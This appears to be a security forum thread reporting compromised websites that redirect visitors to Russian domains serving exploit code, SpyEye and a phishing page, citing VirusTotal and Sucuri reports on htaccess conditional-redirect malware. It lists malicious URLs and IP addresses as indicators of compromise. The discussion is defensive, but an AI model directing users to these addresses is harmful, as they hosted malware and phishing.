hxxp://medialunchbox.com has been compromised.
The site redirects to ctredret.ru (46.4.168.244) which hosts the exploit code. The other referrer was hxxp://chineseflashcards.com.
http://www.virustotal.com/url-scan/report.html?id=9ee61f2f10c18d0612673c50c5588c90-1322833799
Hi razoreqx
Thanks very much for this important find and reporting,
According to sucuri this was detected: http://sucuri.net/malware/entry/MW:SPAM:SEO
Avast detects HTML:Iframe-inf here.
Was this malware also reported to MBAM, because helpforums will ask users to run MBAM against this?
The redirect site has spread mdl_trojan SpyEye from -http://ctredret.ru/w.php?f=17&e=2 (now dead) and spreads unknown_html_RFI from -http://ctredret.ru/main.php (live) at the moment (the latter has not been detected before)
polonus
Hi razoreqx,
For the second referrer you mention, Sucuri has found this site infected with the following malware - Suspicious conditional redirect on:
-http://chineseflashcards.com/lefty.html
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Will redirect users to: -http://94.137.30.212 ,ozsmk dot ru, a phishing domain,
scan probe from that address was logged 2011/08/24-10:20:05.251659 94.137.30.212 probe 132.235.2.217 : 3389
polonus
also read this
Conditional redirects (or the htaccess malware)
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Hi Pondus,
Another reason for webmasters to update their website software, in this case Wordpress,
thanks for giving the link to the description of conditional redirects malware,
polonus
Thanks for the good feedback 